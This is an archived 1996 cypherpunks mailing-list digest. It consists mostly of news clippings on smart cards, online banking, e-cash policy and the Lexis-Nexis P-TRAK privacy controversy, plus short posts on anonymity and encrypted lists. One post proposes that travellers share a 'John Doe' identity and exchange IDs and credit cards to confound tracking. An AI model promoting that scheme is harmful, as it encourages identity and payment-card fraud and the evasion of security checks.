* The University of Michigan, Western Michigan University, Washington University, the University of Minnesota, the University of North Carolina, Florida University and the University of San Francisco have smart cards for on- and off-campus in cafeterias, bookstores and restaurants. Smart cards are already widely used overseas. In Germany, more than 80 million people have been issued smart cards containing health insurance information. The potential market is huge, with more than half a billion smart cards expected to be in use worldwide by the year 2000, according to the Smart Card Forum, a group dedicated to accelerating the widespread acceptance of smart cards. A Smart Card Forum poll found that almost two-thirds of respondents see smart cards as a convenient option for carrying important personal information, and 40 percent would prefer to use the cards instead of cash for everyday purchases. Another Smart Card Forum survey found that retailers see various benefits such as gathering customer information, offering loyalty or ''frequent shopper'' programs and electronic ticketing and couponing. Despite high expectations, smart cards have a long way to go before they become as popular as ATM cards. Critics of smart cards, worried about privacy issues, liken the card's ability to track a consumer's every purchase to Big Brother in George Orwell's novel ''1984.'' There is also the classic ''chicken and egg'' problem: Merchants don't want to spend the money for smart card equipment until they're in widespread use, while consumers don't want to use smart cards until more merchants accept them. ''It's going to be a tough sell for consumers,'' said Rob Palmer, owner of The Wildflower Cafe, which has participated in the Wells Fargo pilot program for about a year. ''Cash is very convenient.'' Palmer agreed to participate in the experiment because it was free. 
But he said it may not be worth paying for later because smart card business only accounts for about 2 percent of his transactions. It costs about $ 500 per unit for a point-of-service terminal capable of processing smart cards. It's unclear whether banks or merchants will ultimately foot the bill. Many new debit and credit card terminals are also incorporating smart-card capabilities. The Smart Card Forum estimates that it costs 80 cents to $ 15 to manufacture a card, depending on the size of the chip. Right now, banks and card issuers are paying for the cards. Eventually retailers could sell their own affinity cards. Today, some cards can only be used once, others can be reloaded with more cash. To be cost-effective, though, most people think the cards will have to be reloadable and have more than one use. To succeed, smart cards will have to offer clear benefits to merchants (such as loyalty programs that generate repeat business) and to consumers (such as discounts or special promotions). The cash-only cards do not have any security features, so if you lose one, it's easy for someone else to spend your money. Cards that also have personal information will need to have security features such as ''encryption,'' or electronic scrambling that protect against unauthorized use. In fact, a survey of the world's 10 largest central banks released earlier this month by a task force of computer and security experts found that security measures now used with electronic money are adequate to protect consumers from fraud. Companies are also starting to look at other smart card applications. Microsoft Corp. is working with several other companies to develop open standards that integrate smart cards with computers, so that you could transfer money from your checking account onto a smart card using your PC. The smart cards also could be used to make purchases over the Internet. 
Many people are afraid to use credit cards to buy things over the Internet because they're afraid their account numbers will get stolen. Yesterday, Mondex International Ltd. and CyberCash, Inc. announced an agreement to produce smart cards that will let consumers purchase goods over the Internet and download and transfer funds. In 1998 Wells Fargo plans to roll out a multipurpose card made by Mondex that will let people transfer money from their accounts to smart cards via computer. Such smart card technology will be like ''having an ATM in your own home,'' said Janet Hartung Crane, senior vice president for Wells Fargo. American Banker: Thursday, September 26, 1996 Checkfree Sees On-Line Banking Tripling in 1997 By JENNIFER KINGSON BLOOM Peter J. Kight, chief executive officer of Checkfree Corp., makes two predictions about on-line banking. He says that 1996 will be remembered as the year banks learned the power of the technology, and that the number of consumers banking through electronic channels will more than triple in 1997. The statements carry more weight than they would have a year ago, because Mr. Kight's company has transformed itself into a formidable force in the interactive banking market. Once known primarily as a processor of electronic bill payments, Checkfree has acquired four companies this year, giving it a soup-to-nuts line of electronic banking products and services. Behind the acquisitions lies Mr. Kight's vision of banking's future. "Every major bank in the country will be in the market with an electronic banking product within the next 18 months," Mr. Kight said. "It's following exactly the same curve as credit cards." For Mr. Kight, these developments represent the culmination of 15 years of hard work. Just last week, Checkfree announced an agreement to acquire the processing subsidiary of Intuit Inc., which will give it access to the latter company's Quicken product, its customers, and bank partners. "This is what I paid my dues for," Mr. 
Kight said. "This is what we built the company to do." On Wednesday, Checkfree announced partnerships with BellSouth, Capstead Mortgage Co., and the Small Business Administration. The arrangements will let the companies and the agency collect bill payments electronically. Mr. Kight founded Columbus, Ohio-based Checkfree in 1981, when he was 24. The previous year, he was managing a chain of fitness centers in the Southwest. While pondering the best way to sell health club memberships, he hit upon the concept of automatic monthly payments. At the time, only a handful of companies -- most of them insurance providers -- were collecting payments electronically. By 1982, a year after he set up his electronic funds transfer service company, Mr. Kight was named an "entrepreneur of the year" by Ernst & Young. Last year, Checkfree went public. This year the company has acquired Servantis Systems Inc. in Atlanta; Interactive Services Corp. in Portland, Ore.; Security APL in Bloomfield, Ill.; and Intuit Services in Downers Grove, Ill. "Each step, if you look at it, has been one to strengthen our position and our strategic capabilities," Mr. Kight said. Checkfree has kept its headquarters in Ohio, but the acquisition of Servantis' campuslike setting in Atlanta has begged the question of whether the offices might move. Intuit Services employees will remain in Illinois, where the work force likely will expand. Mr. Kight, 40, divides his time between Atlanta and Columbus and said he will decide within a year whether to initiate a formal move. The union of Checkfree and Intuit Services is something of a remarriage. Checkfree was the original processor of payments emanating from Quicken software before Intuit Inc. acquired National Payment Clearinghouse Inc. National designed the banking connections for the rival Microsoft Money personal finance package, and the rechristened Intuit Services Corp. went on to handle the lion's share of payments for PC banking customers. 
"Essentially, Intuit enabled Checkfree to really prove the efficacy of electronic bill payment," Mr. Kight said of the early days. "If it hadn't been for Intuit and the link of Checkfree and Quicken, we wouldn't have gotten to the point where we could prove to the banks that this really does work. "Even though the banks didn't like the fact that we and Intuit did that without them, at the time, they weren't doing it. So what we did is we proved it, to get them to pay attention." What followed was a fairly messy divorce, in which Intuit withdrew its business from Checkfree, and Checkfree sued Intuit for patent infringement. Mr. Kight said he managed to stay friendly with key Intuit executives. He and Scott Cook, Intuit's founder and chairman, had "a great deal of mutual respect," he said. The relationships proved central to the recent acquisition. A telephone call at the beginning of this year from Mr. Kight to Intuit chief executive officer William V. Campbell started the ball rolling. Mr. Kight said a news article about technology companies jockeying for position in electronic commerce prompted him to pick up the phone. He said he told Mr. Campbell: "You've got stress at your bill payment service, but you're growing like crazy. I'm growing like crazy. You're signing up banks, I'm signing up even more banks. Maybe if we work together ... and he said, 'I think you're right.' And that started it." Mr. Kight said he and Mr. Cook agreed each company would do best to focus on its core competency: Checkfree on transaction processing, Intuit on its software. "Part of Intuit's strategy didn't work too well, which was signing up more banks" for its processing service, Mr. Kight said. "But part of its strategy worked extremely well -- the power of Quicken working with the banks." The acquisition will boost Checkfree's bank customers to 181, and the number of individuals for whom it processes transactions to 1.2 million. Seeing 1996 as a turning point, Mr. 
Kight said he hopes bankers will accelerate their moves into electronic banking now that they have easier access to Quicken. Until now, banks that wanted to be compatible with Quicken had to become customers of Intuit Services. Checkfree's main competitor today is Visa Interactive. Looming on the horizon is Integrion Financial Network, a partnership of 15 banks and IBM. "Right now, we're 100% supportive of Integrion, but to the extent that Integrion chooses to work in our business, we'll be very tough competitors," Mr. Kight said. Mr. Kight and numerous industry observers are still trying to make sense of Integrion. Phoebe Simpson, an electronic commerce analyst at Jupiter Communications in New York, said: "It's going to boil down to Checkfree and Visa Interactive in the long run. It's yet to be determined whether Integrion plans to build an entire payment processing unit." But David E. Weisman, who covers the same ground for Forrester Research in Cambridge, Mass., said it will be a three-way race. He said "Checkfree's in good position here because they've got more volume" than Visa or Integrion. John A. Russell, chief spokesman for Integrion member Banc One Corp. in Columbus, Ohio, called the Intuit acquisition a "good move" for Checkfree -- of which Banc One is a longtime customer -- as well as a competitive boost. "It's key for Checkfree to do exactly what they're doing, and that's to get big quickly so they can realize the economies of scale in this manufacturing process," he said. Mr. Kight agreed that such economies of scale would serve his company well as on-line banking gains vogue. "I don't believe that the Internet is going to happen quite as fast as the Internet-focused people believe it's going to," Mr. Kight said. "I think there's going to be a trend toward banks providing more service to their customers (when they) can connect directly to the bank without the Web being involved. 
I think we're going to see that evolution over the next three or four years." But, Mr. Kight added, "I do believe that electronic banking is absolutely on a critical mass-adoption curve as we speak." Success and growth haven't changed Mr. Kight's down-to-business mentality. When asked how he celebrated last week's deal closing, Mr. Kight said, "By getting on a plane and flying to Chicago to meet with the ISC work force." --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From rah at shipwright.com Mon Sep 30 20:44:42 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 1 Oct 1996 11:44:42 +0800 Subject: Mailmasher Message-ID: Hey guys, Take a look at: http://www.mailmasher.com/ It's a way to get your mail through a web page. Pretty useful when you're at a braindead "cyber-cafe" machine and want to read your mail. The problem is, mailmasher knows your POP password. Any way to do this more securely? Cheers, Bob ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From azur at netcom.com Mon Sep 30 20:56:56 1996 From: azur at netcom.com (Steve Schear) Date: Tue, 1 Oct 1996 11:56:56 +0800 Subject: The John Doe rebellion Message-ID: I have some direct insight as to how airlines interpret the new travel provisions and what they are reasonably able to accomplish in improving safety via identity and luggage checks. I was wondering if with gov't trying to compile dossiers on travellers it might be possible for a large enough percentage of frequent air travellers to assume the same identity (e.g., John or Jane Doe). If so, a service could be established to book airline reservations under a single credit card for Does so as to confound automated tracking systems. 
Eventually, Does could arrange to exchange IDs (if their ages and descriptions matched) and even credit cards (again assuming equivalence) to really monkey wrench things. -- Steve From blancw at microsoft.com Mon Sep 30 21:08:37 1996 From: blancw at microsoft.com (Blanc Weber) Date: Tue, 1 Oct 1996 12:08:37 +0800 Subject: POLL RESULTS Message-ID: From: Timothy C. May Interesting that Detweiler returned with a _Russian_ nym. ........................................................................ I don't think LD is Russian. I think he's actually an Asparagus. (bwahhahahhahahhah) .. Blanc From roger at coelacanth.com Mon Sep 30 21:10:34 1996 From: roger at coelacanth.com (Roger Williams) Date: Tue, 1 Oct 1996 12:10:34 +0800 Subject: Encrypted lists and ease of use In-Reply-To: <01IA3FDVFUWO8Y57AQ@mbcl.rutgers.edu> Message-ID: wrote: > Recently I've been involved in a number of small (30 people or > less) mailing lists which occasionally use PGP for encrypted mail. > The hassle comes when one is encrypting a message to the list... Well, let the list server keep track of who is subscribed. > What I propose to do is have a second list, list-encrypted at host, > for every list at host... Why do you need two lists? My server currently hosts a few such lists (for non-profit international technical projects, extended family news, etc.): Subscribers send mail to the list server, PGP-encrypted with the list's public key. The list server decrypts each inbound message with its private key (passphrase entered at reboot). The message may be a message to the list, or a command to the list server. The list server maintains a list of subscribers' public keys and encrypts each list message (or digest, for higher-volume lists) for each subscriber (our lists are small, so we prefer to encrypt mail for one subscriber at a time). Although messages exist temporarily as plain text arrays in the list server, it doesn't maintain an archive of messages. 
And as with any (semi-)secure server, physical security is an issue. As Allen mentioned, I think PGPdomo handles this, but majordomo is pretty easy to hack up for any variation on this theme... -- Roger Williams finger me for my PGP public key Coelacanth Engineering consulting & turnkey product development Middleborough, MA wireless * DSP-based instrumentation * ATE tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/ From dlv at bwalk.dm.com Mon Sep 30 21:27:13 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 1 Oct 1996 12:27:13 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: Money Daily: Tuesday, September 24, 1996 IBM, Bank Alliance May Speed Acceptance of Online Banking By Lloyd Chrein If one muscle-bound company is what it will take to turn online banking into a household word, then the recently-formed Integrion Financial Network, a conglomeration of IBM and 15 heavy-hitting U.S. and Canadian banks, may have the right formula, say analysts. In many ways Integrion appears a natural fit: the meeting of a major data-processing player -- IBM -- and institutions that will potentially need a lot of online data processed -- banks. The new company, a separate entity with its own CEO and board of directors, will offer the means for consumers to connect to their banks (via the IBM Global Network, the Internet or commercial online services) and will partner with developers of the necessary online banking software. It is expected to begin operating in early 1997. "If they can use the clout of all these big banks, plus IBM, to decrease the cost of providing online banking and ultimately lower costs and improve service for consumers, then they're going to coax more consumers into online banking," says Karen Epper, an analyst with Forrester Research. "The question is whether this big ship can move quickly enough to keep up with the changes in the online world and stay in the race." 
As things stand now, it seems like there is a lot of ground to be made up. A recent study by the San Francisco-based Odyssey L.P. found that just a handful of American households use the 'Net for banking -- just 1% of the 14% of U.S. households with access to an online service. "Online banking is confined to a small minority of a small minority," said Nicholas Donatiello president of Odyssey. "But I think it has the potential to be bigger." Members of Integrion, however, took issue with the Odyssey report. "Those numbers don't seem right," said David Fortney, in charge of access and payment strategies for the Charlotte based NationsBank. "But we do agree that there are not a lot of people banking online. We see that as a huge opportunity. We think there is a lot of pent-up demand." A Barnett Bank spokeswoman said that 25% of the bank's current customers use the telephone for home banking, an indicator that online banking through Integrion -- which should be more convenient -- will also be a hit. "We will see an explosion in this area," she predicted. The problem with online banking as it exists now, say Integrion members, is that each bank offers different levels of service, uses different software, and has to bear the full cost of designing and managing its online system. With Integrion, they note, banks will be able to take advantage of economies of scale, ultimately offering consumers a wider choice of software programs and means of accessing their accounts than if they went it alone. "What we hope to do is speed the pace at which electronic banking services will reach the consumer," says Chuck Hieronymi, senior vice president of marketing at NationsBank. "We also hope to speed the rate at which banks will adopt online banking. We hope to attract as many banks to join as possible." 
The company intends to eventually allow consumers to use most of the major personal finance software, including Microsoft Money and Intuit's Quicken, as well as Internet browsers like Netscape Navigator and Microsoft Explorer and online services Prodigy, America Online and CompuServe. While Integrion hasn't formed any alliances with developers or online services so far, potential partners are warm to the concept. "We fully expect our products and technology will be a part of this," says Matt Cone, business development manager for Microsoft, who notes that there are also potential uses for Windows NT and BackOffice. To attract all the major players under one roof, Integrion needs to be big. And it is: the 15 member banks comprise over half the retail banking population in North America -- more than 60 million households. Member banks are: ABN AMRO, BANC ONE, Bank of America, Barnett Bank, Comerica, First Bank Systems, First Chicago NBD, Fleet Financial Group, KeyCorp, Mellon Bank, Michigan National Bank, NationsBank, PNC Bank, Royal Bank of Canada, and Washington Mutual, Inc. Of course, there is competition, mainly from data processing companies such as CheckFree and Visa Interactive -- IBM will perform their functions for Integrion member banks. Yet according to Epper, even the competitors are potential partners in cyberspace. "CheckFree will compete for the same bill payment system contracts as Integrion, but it will also work with Integrion to support bill payment systems," says Epper. "In the online world, companies that are competitors are also working together. That has been the paradigm for a long time." To have any effect on improving online banking's numbers, Integrion will have to stay on the cutting edge, reacting quickly to rapid changes in security, authentication and other technological advancements. Hieronymi claims that the company will be able to make quick decisions and won't be weighed down by the girth of its many members. 
But Epper has her doubts. "This company has been speculated about for two years and in serious discussion for the past year," she says. "At the rate at which online banking is moving, if they take that long to make decisions they are likely to lose a real advantage. As it is, they're already a little late to the party." For more Web-formation, visit: http://www.checkfree.com for CheckFree http://www.forrester.com for Forrester Research http://www.ibm.com for IBM http://www.intuit.com for Intuit http://www.nationsbank.com for NationsBank Computerworld: September 23, 1996 Can Banks Survive the Online Onslaught? By Ralph Soucie Recently, Hugh McColl, chairman of NationsBank, admitted to The Wall Street Journal that he is scared of what technology might do to his business. That isn't something you'd expect from the architect of a $192 billion banking powerhouse. Clearly, though, trouble lies ahead for banks. The endgame of the recent bank merger wave looks pretty bleak. Eventually, some eight to 12 banking behemoths will blanket the country. These giants will look, act and smell the same to consumers. Absent some sort of blockbuster development, the entire industry seems headed for the same fate suffered recently by the large retailers. But that blockbuster development is inevitable, and it surely will be driven by information technology. Technology -- at least the leading-edge stuff that creates monster opportunities -- isn't most banking executives' major stock-in-trade, so they don't even know where their future competitors are going to come from. To be sure, banks are trying some new tricks as they scrounge for growth. Some, for instance, are using automated teller machines to dispense coupons and sell event tickets. Not a bad idea, but it still doesn't solve the core problem. Electronic home banking software seems a better fit, but so far, it has generated me-too products and little profit. 
Meanwhile, bankers' favorite retail customers -- cash-rich individuals with low transaction activity -- are a threatened species. Taking money from these customers and lending it to free-spending Baby Boomers is really the heart of retail banking nowadays. But families who inherit such liquid assets from their parents are likely to apply much of this loot to debt reduction. The problem is that consumers don't perceive high value in generic banking services, and with good reason. As surely as you're reading this, within a generation we'll be carrying our financial assets around on some form of smart card. You'll deal with your depository bank much as you interact with the bank that issues your credit card. But the irony is that all this doesn't have to be the death knell for the banking industry. Banking executives simply need to worry less about high-tech rivals and more about the value they add to customer services. Take the lowly bank statement, for example. What if a bank offered small businesses the option of receiving their bank statements in electronic form, say, as an Excel spreadsheet file? Why not provide a listing of canceled checks for the entire fiscal year? The owner could then take this disk file, along with his check register, to his accountant. The accountant would then add data such as payee name and the date the check was written. For a small business that writes 100 checks per month, this could save a few hundred dollars in fees. That's a bank service that packs a punch, yet the incremental cost to the bank of providing the service would be very small. Numerous variations are possible. For instance, nonbusiness bank customers might find it useful to flag tax-deductible payments by putting an X in a box when they write the check. The bank can then provide a year-end listing of tax deductions -- a great headache-buster at tax time. It doesn't take advanced technology to deliver services such as these. 
What it takes is customer-oriented thinking, combined with simple awareness of how technology can support a new value proposition. So, while bankers should heed Andy Grove's "paranoia is good" message, they should worry less about technology threats and more about an industry culture that's rooted in an assumption of entitlement. Money Daily: Thursday, September 19, 1996 Privacy Storm Shows the Best and Worst of the 'Net By Michael Brush The flap over a new service from Lexis-Nexis is probably misguided, but raises interesting questions about privacy and the power of online communication. An online brouhaha that broke out this week over alleged privacy breaches caused by a new Lexis-Nexis product has put both the best and worst of the 'Net community in high profile. The Dayton, Ohio-based online database company has been swamped with phone calls and faxes this week because of a flurry of e-mails and news-group postings warning readers of the allegedly dire consequences of its new product called P-TRAK. Many of the warnings falsely claim that P-TRAK provides a wide range of potentially sensitive personal information ranging from social security numbers to medical and credit histories. On the bright side, the controversy shows the huge power of the 'Net when used by public-spirited advocates to mobilize a response to a perceived danger -- in this case, a threat to privacy. On the dark side, the fact that many of the allegations in the electronic correspondence are plain wrong shows how easy it is to spread misinformation and, potentially, raise what could amount to an online lynch mob. At issue is a product launched last June which provides Lexis-Nexis clients with basic public information about anyone in a 300 million-name database. The information available is culled from credit bureau records. 
It is limited to your name, your maiden name or alias (if any), your current and two most recent past addresses, the month and year of your birth, and your phone number -- though not all of that information is available on every person. For nine days after the product was released last June 2, P-TRAK also included your social security number. But the SSNs were pulled on June 11 because of complaints, says Lexis-Nexis spokesman Steve Edwards. If you already know someone's social security number, though, you can search for him or her using that number. P-TRAK is meant to help attorneys track down witnesses, heirs or parents who have stopped paying child support, says Edwards. While the scope of P-TRAK is relatively limited compared to, say, credit reports, which carry news of your payment history, bankruptcies and other such sensitive material, it nonetheless sparked the ire of many 'Net users. For example, one posting that was later widely circulated this week claimed that your social security number, "mother's maiden name, birth date and other personal information are now available to anyone with a credit card." It postulated that the information could allow someone to commit credit card fraud or use your identity. The truth is somewhat tamer. The SSN and mother's maiden name are not included, for example, and the database is available only to clients like law firms and news organizations that can afford Lexis-Nexis's relatively hefty fees. Furthermore, Money Daily's spot check shows that the information available is spotty at best. A search of P-TRAK run on our behalf by the Time Inc. Research Center turned up the right addresses but no phone or birth date for this author. It got the addresses and birth year correct for Money Daily editor Kevin McKean, but had an obsolete phone number. 
And when confronted with relatively more common names of two other Money Online staffers -- tech director Wilson Smith and reporter Joseph "Tripp" Reynolds -- turned up dozens of people, none of whom proved to be the correct ones. Those limitations notwithstanding, the roar on the 'Net was heard at Lexis-Nexis headquarters. "We have been deluged with people calling, writing and faxing," says Edwards. "People are asking us: 'Why are you putting my medical records, my mother's maiden name, and my credit card history out there?' This has been testing the limits of our customer service." In response, Lexis-Nexis posted a statement on its home page to correct false information about the product and also a form you can use to remove your name from the list, something the company says people could have done all along by calling. By next Monday, Edwards says the firm will also have an 800 number that callers can use. People who phone the company's current 800 number are told to fax name-removal requests to 513-865-1930. The company has stopped short of posting responses in news groups or bulletin boards, though. "There are different schools of thought on that," says Edwards. "One says that you should never respond to news groups from a company standpoint because that increases the amount of flaming. But at this point, I don't know how much worse it could get." In the company's place, other news group participants have stepped in to set the record straight. "I think you owe a post to correct this error," one such correspondent scolded in a reply that pointed out several errors in the message quoted above. Ironically, the information available in P-TRAK is mild compared to what is available elsewhere in the vast Lexis-Nexis database. A related product, called P-FIND, for example, offers additional household information like the appraised value of a home in many states and the number of dependents (both of which are public information). 
The main Nexis database digs up information from news stories -- often from local papers -- published around the world and in several different languages. Many of those stories, of course, contain information of arrests and charges that may later prove groundless, as well as a volume of personal information about the people cited in the articles. And the legal Lexis service contains not only details from civil and criminal court cases around the nation, but also other potentially sensitive information, such as tax liens and judgments against individuals. Before you get your hackles up over invasion of privacy, though, consider that all of the above is public information -- and, of course, much of it is potentially more sensitive than your previous address. For more Web-formation, visit: Lexis-Nexis (http://www.lexis-nexis.com) Lexis-Nexis statement (http://www.lexis-nexis.com/lncc/p-trak/index.html) Form to remove your name from the Lexis-Nexis database (http://www.lexis-nexis.com/lncc/about/ptrak.html) Reuters: Friday, September 20, 1996 Summers: Electronic Cash Won't Affect Economy Much The advent of electronic money is not expected to have any major macroeconomic effect in the medium term, U.S. Deputy Treasury Secretary Lawrence Summers said on Friday. "I do not anticipate in the near and medium term significant macro-economic effects," Summers told reporters following a speech to a conference on electronic money sponsored by the Treasury Department. Some analysts have speculated that the Federal Reserve's ability to conduct monetary policy may be undermined by the issuance of electronic money over the Internet or elsewhere. Others have suggested that the Fed and Treasury could lose profits from seigniorage -- the income earned by currency issuers because currency pays no interest to holders. Summers though played down both those concerns. He noted that much U.S. currency is held abroad and said electronic money is unlikely to substitute for that anytime soon. 
As for monetary policy, it already works indirectly through open market operations, he noted. "As we move from credit cards to debit cards to stored value cards, I think the Fed will continue to have the ability, by operating in the government securities market, to have a substantial influence on the level of interest rates," Summers said. He saw macroeconomic benefits to be gained from the advent of electronic money and stored value. If, like credit cards, they make it easier for consumers to purchase goods during economic downturns, then they can act as a stabilizing force on consumption. "To the extent that these technologies and the Internet make markets more competitive, they will tend to ... be a force against inflation," he added. Reuters: Wednesday, September 18, 1996 Germany to Let Only Banks Issue E-Cash By Catherine O'Mahony Bundesbank council member Franz-Christoph Zeitler on Wednesday welcomed government plans to give only banks the right to issue pre-paid cards or so-called electronic purses. Stressing the German central bank's concern about electronic money, he said banks were the safest guardians of electronic cash systems since they had to meet legally-imposed liquidity restrictions and had long experience of cashless payments. Zeitler said in a statement that electronic money innovations were fundamentally positive as a way to speed up transfers. But "it is also important that the security of payment transfers and currency stability do not get left behind," he added. Electronic purses are plastic cards with an inbuilt micro-chip which stores the electronic cash value of users' accounts and can be reloaded at special machines. The proposal to restrict such projects to banks is part of a new German banking law which is still under preparation but which is expected to be enforced in 1997. 
Zeitler said issuers of electronic cash had to be extremely reliable because a sudden collapse of an electronic cash system, due to forgery or technical failure, could have "significant negative" consequences for the economy. While electronic purses, also known as smart cards, are not yet available in cash-dominated Germany, tests are being run on several projects. Current projects being tested in the Munich region include a card to pay for telephone calls and local train tickets and another with broader application, which can be used for small purchases up to 50 marks ($33.03). Worldwide, the most prominent electronic purse project is Mondex which was developed in Britain by National Westminster Bank and is on trial in the town of Swindon. Zeitler said it was likely that Bonn would also restrict the rights to create and maintain Internet-based electronic cash systems to the banking industry. Internet banking is slowly gaining credence in Germany. Bavaria's Bayerische Hypotheken und Wechsel Bank recently launched a securities account accessible via the Internet. ($1=1.5138 Mark) American Banker: Thursday, September 19, 1996 Seeking Security, Banks Turn to Internet Certification By DREW CLARK On the Internet, no one can tell if you're a dog. This line, from a New Yorker cartoon, belies a serious problem for banks and merchants setting up sites on the World Wide Web: There is no widely accepted method for authenticating the claims -- or the identity -- of those conducting business on-line. To help solve this problem, two companies have begun certifying businesses by granting them "seals of approval" on the Web. "There needs to be some way that consumers can easily recognize when a site is secure and when it is not secure," said Michael S. Karlin, president of the Security First Network Bank. "Consumers are afraid, even in an FDIC-approved banking situation, and they want the feeling that it is secure." 
One of the first systems to offer authentication for commercial sites on the World Wide Web is TrueSite, developed by Application Programming and Development Inc. of Camp Springs, Md. BankAmerica Corp., Mellon Bank Corp., and First Bank System Inc. are among 30 financial institutions and 2,000 businesses whose Web sites have been certified. Though the Web provides businesses with a flexible, highly visible medium for presenting their message, on-line business has its drawbacks. A Web site user can download the entire contents of a Web page, alter it, and establish a dummy site at a new location. TrueSite guards against such occurrences by letting certified banks and businesses put a blue check mark symbol on their home pages for an annual fee of $495, which has been waived for six months. Users clicking on the logo will be warned if it has been fraudulently copied. "A user won't have to ask, 'Did I get to the correct site in the first place?,'" said Mark Burnett, president of Application Programming, which has annual revenues of $2 million. "Whether consumers feel comfortable engaging in transactions on the Internet is a function of how they feel," added Jack Rogers, president of the Fairfax, Va.-based American Finance & Investment Corp. "Their perception is as important as reality." Another certification was launched in July by the National Computer Security Association in Carlisle, Pa. The association requires that certified companies protect their Web sites against Internet attacks by using data encryption, by maintaining detailed logs, and by establishing firewalls within the computers that host Web sites. "You better have some confidence that a hacker doesn't have access to checking accounts," said Kevin J. Stevens, a product manager at the for-profit association, which has annual revenues of $5 million. 
"If banks don't take the steps to be certified and give their market some indication that they have instituted a security program, no public relations is going to resolve only one slip-up." So far six companies have each paid upwards of $8,500 for a detailed on-site audit before getting the association's stamp of approval. Mr. Stevens declined to identify them, but said they include one of the big three auto companies. "This is a great first step. What the NCSA has done is to put the bar up," said Security First's Mr. Karlin. He anticipates that the virtual bank will be certified within two months and hopes that the association will eventually introduce a system with several passing grades. America Online Inc. and the Better Business Bureau are also getting into the certification business. In conjunction with America Online's move to the New York Stock Exchange from Nasdaq, its top officials reemphasized the features of the largest on-line service and announced 10 new criteria that merchants will be required to meet. The standards include processing orders and responding to E-mails within one day of receipt and giving on-line customers equal priority with telephone customers. "AOL members will come to know and have confidence in people who display the seal of approval," said Michael J. Minigan, the service's vice president of interactive marketing. "It is our hope that at some point, merchants doing business on the Web would want to have the AOL seal on their Web sites." Officials at the Better Business Bureau promote self-regulation and full disclosure of company complaints to fill cues missing from on-line commerce. "For $30 a month, a business can design a fabulous Web page that can lead a consumer to think they are a Fortune 500 company," said spokeswoman Holly Cheriko. "The consumer is left without the cues in the traditional marketplace like being able to visit, talk to the sales clerk, and view the quality of the marketplace. 
They need a trusted means to determine which businesses are reliable and what commitment they have made to the consumer."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From ponder at freenet.tlh.fl.us Mon Sep 30 21:34:22 1996
From: ponder at freenet.tlh.fl.us (P. J. Ponder)
Date: Tue, 1 Oct 1996 12:34:22 +0800
Subject: GPS
Message-ID:

The National [US] Academy of Sciences has a new web spot called 'Beyond Discovery' and one of the articles posted is about the Global Positioning System. You may observe same at:

http://www2.nas.edu/bsi/20fe.html

Oops: I just learned the name 'John Anonymous MacDonald' gets stuck on mail that goes through a certain remailer, no matter who sends it. And I thought it was one particular idiot. Turns out, it's any number of people, plus one particular idiot.

--
to unsubscribe write to majordomo at toad.com with the words unsubscribe cypherpunks in the body (not the subject) of the message.

From travel23 at juno.com Mon Sep 30 21:35:07 1996
From: travel23 at juno.com (The Traveler)
Date: Tue, 1 Oct 1996 12:35:07 +0800
Subject: Katz on cypherpunks, in HotWired's Media Rant
Message-ID: <19960930.191626.3558.0.travel23@juno.com>

Declan McCullagh wrote:
>
>[Background: the cypherpunk/pw:cypherpunk account used for HotWired's
>Threads discussion section has been used for anonymous flaming and
>attacks. --Declan]
>
>HotWired
>The Netizen
>30 Sep 96
>
> Cypherpunks don't want real confrontations or discussions, or they
> would reveal their identities and make it possible to respond, as most
> flamers do. They are among media's rarest and at the same time most
> easily recognized subspecies: nihilists.

Well, this really advances the cause for anonymous emailing. It's even more upsetting that, because one knucklehead used cypherpunks as his name and pw, his empty-headed rants become associated with the list and the concept.
The primary point, however, is that right of privacy regarding anonymous email is being submerged by idiots who use it to stroke their minuscule egos. Look at how many remailers have gone under because of abuse - or, better yet, look at Georgia's new law regarding the use of nyms.

Tied in with the right to privacy is the right of free speech. The problem is that the general public, with few exceptions, understand this. Most, I believe, would support the right to privacy; however, if they encounter anonymous flaming - especially if it is politically incorrect/profane/abusive, then we would hear the call for an immediate end to the right to privacy and a demand for the hanging of anonymity at high noon.

From leegib at microsoft.com Mon Sep 30 21:57:14 1996
From: leegib at microsoft.com (Lee Gibbon)
Date: Tue, 1 Oct 1996 12:57:14 +0800
Subject: FW: [INFO] Internet Privacy: Reflections on Europe in the Digital Age
Message-ID:

>-----Original Message-----
>----------
>
>this is probably obvious to many of you, but it is still interesting and
>sobering to see the issue spelled out all in one place....
>
>>----------
>>
>>Forwarded-by: Phil Agre
>>
>>Date: Fri, 20 Sep 1996 19:16:19 +0200
>>From: steve at isys.hu (Steven Carlson)
>>To: hungary-online-announce at hungary.yak.net
>>Subject: (HOL-A) It's a Brave Old World
>>
>> ------------------------------
>> Brave Old World:
>> Reflections on Europe in the Digital Age
>> by Steven Carlson; 20 Sep 1996
>> ------------------------------
>>
>> ** So Much Fuss About A Bottle Of Ketchup
>>
>> Hungarian police recently sent a fax around to the local Internet
>> service providers (ISPs) asking them to provide lists of their users
>> in Esztergom, a small town outside of Budapest. It seems somebody
>> had planted a bomb in a bottle of ketchup. Since everyone knows you
>> can download bomb-making instructions from the Internet, the police
>> figured they should investigate the local users. No, I'm not making
>> this up.
>>
>> What's more, nearly every local ISP gave the police this information.
>> Fortunately my company has no users in Esztergom and so that's what we
>> told the police. We got off lucky. Believe me, as much as I might want
>> to make a stand for privacy of information my company is NOT eager to
>> do battle with the Hungarian authorities.
>>
>> But that's what it might take. Because if the Hungarian police really
>> understood the Internet they could have asked for even more. For
>> example, it would only take a few keystrokes to forward a user's mail
>> to the authorities. The police might also have asked for old email,
>> since many ISPs back this up routinely.
>>
>> But that's not all. Some ISPs run caching servers, machines that store
>> frequently-viewed webpages so that users access them locally rather
>> than across the net. An ISP's caching server could give the police a
>> profile of what web pages the users have been browsing.
>>
>> I'm not trying to scare anyone. My point is that sharing information
>> on the Internet is a two-way street. Computers keep extensive records.
>> Using the Internet often means you leave a trail behind you. This is
>> part of life in the digital age.
>>
>> This "electronic trail" is not unique to the Internet. Every time you
